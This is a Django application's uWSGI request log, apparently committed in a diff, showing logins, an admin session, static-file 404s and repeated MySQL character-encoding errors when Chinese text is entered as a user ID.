+[pid: 11057|app: 0|req: 856/1121] 180.160.72.163 () {48 vars in 1161 bytes} [Thu Jan 14 08:45:51 2021] POST /login/ => generated 27 bytes in 21 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 857/1122] 180.160.72.163 () {42 vars in 1104 bytes} [Thu Jan 14 08:45:52 2021] GET /home/ => generated 7869 bytes in 16 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 858/1123] 180.160.72.163 () {40 vars in 1055 bytes} [Thu Jan 14 08:46:00 2021] GET /login/ => generated 6428 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE7\\xA5\\x9E\\xE7\\xA7\\x98...' for column 'uid' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE7\\xA5\\x9E\\xE7\\xA7\\x98...' for column 'uid' at row 1")
+[pid: 11057|app: 0|req: 859/1124] 180.160.72.163 () {48 vars in 1160 bytes} [Thu Jan 14 08:46:14 2021] POST /login/ => generated 210206 bytes in 161 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE7\\xA5\\x9E\\xE7\\xA7\\x98...' for column 'uid' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE7\\xA5\\x9E\\xE7\\xA7\\x98...' for column 'uid' at row 1")
+[pid: 11057|app: 0|req: 860/1125] 180.160.72.163 () {48 vars in 1160 bytes} [Thu Jan 14 08:46:39 2021] POST /login/ => generated 210269 bytes in 129 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 861/1126] 180.160.72.163 () {48 vars in 1160 bytes} [Thu Jan 14 08:46:58 2021] POST /login/ => generated 27 bytes in 24 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 862/1127] 180.160.72.163 () {42 vars in 1103 bytes} [Thu Jan 14 08:46:58 2021] GET /home/ => generated 7869 bytes in 12 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+Not Found: /
+[pid: 11057|app: 0|req: 863/1128] 83.97.20.29 () {26 vars in 278 bytes} [Thu Jan 14 08:47:11 2021] GET / => generated 3429 bytes in 8 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 864/1129] 180.160.72.163 () {40 vars in 1063 bytes} [Thu Jan 14 08:47:22 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 11057|app: -1|req: -1/1130] 180.160.72.163 () {40 vars in 1098 bytes} [Thu Jan 14 08:47:22 2021] GET /static/img/back-top-btn.png => generated 1789 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 11057|app: 0|req: 865/1131] 180.160.72.163 () {40 vars in 1063 bytes} [Thu Jan 14 08:47:24 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 866/1132] 180.160.72.163 () {48 vars in 1174 bytes} [Thu Jan 14 08:47:30 2021] POST /login/ => generated 27 bytes in 25 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 867/1133] 180.160.72.163 () {42 vars in 1111 bytes} [Thu Jan 14 08:47:30 2021] GET /home/ => generated 7869 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 868/1134] 180.160.72.163 () {40 vars in 894 bytes} [Thu Jan 14 08:48:13 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 11057|app: -1|req: -1/1135] 180.160.72.163 () {40 vars in 863 bytes} [Thu Jan 14 08:48:13 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1136] 180.160.72.163 () {40 vars in 885 bytes} [Thu Jan 14 08:48:13 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1137] 180.160.72.163 () {40 vars in 867 bytes} [Thu Jan 14 08:48:13 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1138] 180.160.72.163 () {40 vars in 865 bytes} [Thu Jan 14 08:48:13 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1139] 180.160.72.163 () {40 vars in 871 bytes} [Thu Jan 14 08:48:13 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: 0|req: 869/1140] 180.160.72.163 () {48 vars in 1008 bytes} [Thu Jan 14 08:48:36 2021] POST /login/ => generated 27 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 870/1141] 180.160.72.163 () {40 vars in 912 bytes} [Thu Jan 14 08:48:36 2021] GET /home/ => generated 7870 bytes in 12 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 871/1142] 180.160.72.163 () {38 vars in 864 bytes} [Thu Jan 14 08:48:48 2021] GET /login/ => generated 6428 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE5\\x93\\x88\\xE5\\x93\\x88' for column 'uid' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE5\\x93\\x88\\xE5\\x93\\x88' for column 'uid' at row 1")
+[pid: 11057|app: 0|req: 872/1143] 180.160.72.163 () {48 vars in 1008 bytes} [Thu Jan 14 08:48:58 2021] POST /login/ => generated 209865 bytes in 165 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 873/1144] 180.160.72.163 () {40 vars in 920 bytes} [Thu Jan 14 08:49:37 2021] GET /my-admin/ => generated 5366 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /favicon.ico
+[pid: 11057|app: 0|req: 874/1145] 180.160.72.163 () {38 vars in 807 bytes} [Thu Jan 14 08:49:37 2021] GET /favicon.ico => generated 3480 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 875/1146] 180.160.72.163 () {48 vars in 1017 bytes} [Thu Jan 14 08:49:42 2021] POST /my-admin/ => generated 27 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 876/1147] 180.160.72.163 () {40 vars in 927 bytes} [Thu Jan 14 08:49:42 2021] GET /admin-home/ => generated 6515 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 11057|app: -1|req: -1/1148] 180.160.72.163 () {40 vars in 927 bytes} [Thu Jan 14 08:49:42 2021] GET /static/assets/plugins/bootstrap/css/bootstrap.min.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: -1|req: -1/1149] 180.160.72.163 () {40 vars in 873 bytes} [Thu Jan 14 08:49:42 2021] GET /static/css/colors/blue.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: -1|req: -1/1150] 180.160.72.163 () {40 vars in 861 bytes} [Thu Jan 14 08:49:42 2021] GET /static/css/style.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: -1|req: -1/1151] 180.160.72.163 () {40 vars in 890 bytes} [Thu Jan 14 08:49:42 2021] GET /static/assets/plugins/jquery/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: -1|req: -1/1152] 180.160.72.163 () {40 vars in 902 bytes} [Thu Jan 14 08:49:42 2021] GET /static/assets/plugins/bootstrap/js/tether.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: -1|req: -1/1153] 180.160.72.163 () {40 vars in 908 bytes} [Thu Jan 14 08:49:42 2021] GET /static/assets/plugins/bootstrap/js/bootstrap.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: -1|req: -1/1154] 180.160.72.163 () {40 vars in 866 bytes} [Thu Jan 14 08:49:42 2021] GET /static/js/jquery.slimscroll.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: -1|req: -1/1155] 180.160.72.163 () {40 vars in 842 bytes} [Thu Jan 14 08:49:42 2021] GET /static/js/waves.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: -1|req: -1/1156] 180.160.72.163 () {40 vars in 854 bytes} [Thu Jan 14 08:49:42 2021] GET /static/js/sidebarmenu.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: -1|req: -1/1157] 180.160.72.163 () {40 vars in 930 bytes} [Thu Jan 14 08:49:43 2021] GET /static/assets/plugins/sticky-kit-master/dist/sticky-kit.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 877/1158] 180.160.72.163 () {38 vars in 885 bytes} [Thu Jan 14 08:49:43 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 878/1159] 180.160.72.163 () {38 vars in 853 bytes} [Thu Jan 14 08:49:43 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 879/1160] 180.160.72.163 () {38 vars in 897 bytes} [Thu Jan 14 08:49:43 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 880/1161] 180.160.72.163 () {38 vars in 873 bytes} [Thu Jan 14 08:49:43 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 881/1162] 180.160.72.163 () {38 vars in 873 bytes} [Thu Jan 14 08:49:43 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 882/1163] 180.160.72.163 () {38 vars in 889 bytes} [Thu Jan 14 08:49:43 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 12 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 883/1164] 180.160.72.163 () {38 vars in 821 bytes} [Thu Jan 14 08:49:43 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 884/1165] 180.160.72.163 () {38 vars in 929 bytes} [Thu Jan 14 08:49:43 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 885/1166] 180.160.72.163 () {38 vars in 819 bytes} [Thu Jan 14 08:49:43 2021] GET /static/css/animate.css => generated 3513 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 11057|app: -1|req: -1/1167] 180.160.72.163 () {40 vars in 852 bytes} [Thu Jan 14 08:49:43 2021] GET /static/js/custom.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
